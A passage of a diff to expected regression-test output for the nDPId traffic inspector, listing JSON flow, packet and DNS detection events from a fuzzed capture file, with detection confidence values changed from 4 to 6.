{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1120470171641,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470171641,"pkt":"ADBUADRWAODtAW69CABFAABIaq0AAIARTKTAqAECwKgBAQrhADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3RkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._tdp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470171641,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._tdp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470173644,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1120470173644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470173644,"pkt":"ADBUADRWAODtAW69CABFAABIaq4AAIARTKPAqCVzgKgBAQrGADUANOIMR\/IBABwBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1120470175647,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470175647,"pkt":"ADBUADRWAODtAW69CABFAABIaq8AAIARTKLAqAECwKgBAQrGADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAIhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":545,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470175647,"flow_last_seen":1120470175647,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470175647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":545,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1120470179653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470179653,"pkt":"ADBUADRWAODtAW69CABFAABIarAAAIARTKHAqAECwKgBAQrGADUANOIMR\/IBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJZ3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.gybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.gybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469985981,"flow_last_seen":1120469994988,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470179653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1120470187655,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470187655,"pkt":"ADBUADRWAODtAW69CABFAABEarEAAIARTKTAqAECwKgBAQrHADUAMPwEKPMAAAABAAAAAAAAATEBMAEwAzEyNwdzbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.sn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187655,"flow_last_seen":1120470187655,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470187655,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.sn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470187656,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1120470187656,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470187656,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEAlcwDAqAEBwKgBAgA1CscAR96AKPOAAAABAAEAAAAAATFCMAEwAzEyNwdpbq1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470187658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470187658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470199678} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470187658,"pkt":"ADBUADRWAODtAW69CABBAABIarMAAIARTJ7xqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470200673,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1120470200673,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470200673,"pkt":"ADBUADRWAODtAW69CABFAABIaqsAAIARTJ3AFgECwKgBAQrIADUANHAIufQBALQBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1120470202676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69CABFAABIarUAAIARTJzAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEZXVkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470202676,"flow_last_seen":1120470202676,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470202676,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip.eudp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":47872,"global_ts_msec":1120470204679} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":306,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":47872,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"ADBUADRWAODtAW69uwBFAABIarYAAIARTJvAqAECwKgBAQrIADUANHAIufQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":307,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470207908} @@ -525,111 +525,111 @@ 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470208654} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":308,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470202676,"pkt":"\/\/\/\/\/\/\/\/AODtAW69JXMAAABOargAAIARS5XAqAECwKgB\/wCJAIkAOlt+hZ0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVOREJFSkVPQ0FDQUNBQ0GQQUJNAAAgAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1120470208684,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470208684,"pkt":"ADBUADRWAODtAW69CABFAABIarkAAIARTJjAqAECwKgBAQrIADUANHAIufQBAAABAAAAADYABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470208684,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470015072,"flow_last_seen":1120470024079,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470209405,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470216686,"flow_last_seen":1120470216686,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470216686,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 